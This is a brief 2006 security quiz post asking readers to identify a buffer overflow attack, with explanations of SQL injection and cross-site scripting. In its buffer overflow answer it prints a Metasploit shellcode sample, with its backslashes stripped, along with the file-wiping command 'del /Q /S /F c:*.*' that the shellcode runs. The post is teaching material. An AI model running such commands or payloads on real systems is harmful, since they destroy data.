Identifying buffer overflow attack

By balaji

August 6, 2006

An attacker enters a long nasty looking string into the date field. The input overwrites parts of the running program and executes commands on the server. What type of attack just took place?

  1. SQL Injection attack
  2. Buffer Overflow attack
  3. Cross Site Scripting attack

The correct answer is 2) Buffer Overflow attack

In a SQL Injection attack, an attacker inputs specially crafted value in an input field that the application uses to construct a dynamic query to the database. This results in the query getting manipulated and more information being revealed to the attacker. We discuss the basics of SQL injection in the Learning Center. In Jun we analyzed how they affect stored procedures too, in the pages of Palisade.

In a buffer overflow attack, the input takes more space than allocated for the variable. It overflows the allocated buffer and overwrites adjacent memory locations. When the input is carefully crafted, it lets the attacker run commands of his choice. Here's one such input, courtesy the Metasploit project. It executes the command:

del /Q /S /F c:*.*

"x33xc9x83xe9xdaxd9xeexd9x74x24xf4x5bx81x73x13xd8xadx5e x3dx83xebxfcxe2xf4x24x45x1ax3dxd8xadxd5x78xe4x26x22x38 xa0xacxb1xb6x97xb5xd5x62xf8xacxb5x74x53x99xd5x3cx36x9c x9exa4x74x29x9ex49xdfx6cx94x30xd9x6fxb5xc9xe3xf9x7ax39 xadx48xd5x62xfcxacxb5x5bx53xa1x15xb6x87xb1x5fxd6x53xb1 xd5x3cx33x24x02x19xdcx6ex6fxfdxbcx26x1ex0dx5dx6dx26x31 x53xedx52xb6xa8xb1xf3xb6xb0xa5xb5x34x53x2dxeex3dxd8xad xd5x55xe4xf2x6fxcbxb8xfbxd7xc5x5bx6dx25x6dxb0x5dxd4x39 x87xc5xc6xc3x52xa3x09xc2x3fxc9x3bx51xf8x82x0fx1dxf7xfe x7ex12x9ex8dx3dx07x84x87x70x17xd8xadx5ex3d"

Read our discussion on the techniques to prevent Buffer overflow in the back pages of Palisade.

A Cross site scripting or XSS attack is aimed at stealing sensitive user information like session tokens. A common attack method is to send a mail to the victim with a link to a valid site along with a javascript as part of the URL. When the victim clicks on the link, the browser executes the script which retrieves the user's cookies and mails to the attacker. XSS was the topic of the April 2005 quiz.

Tags: Quiz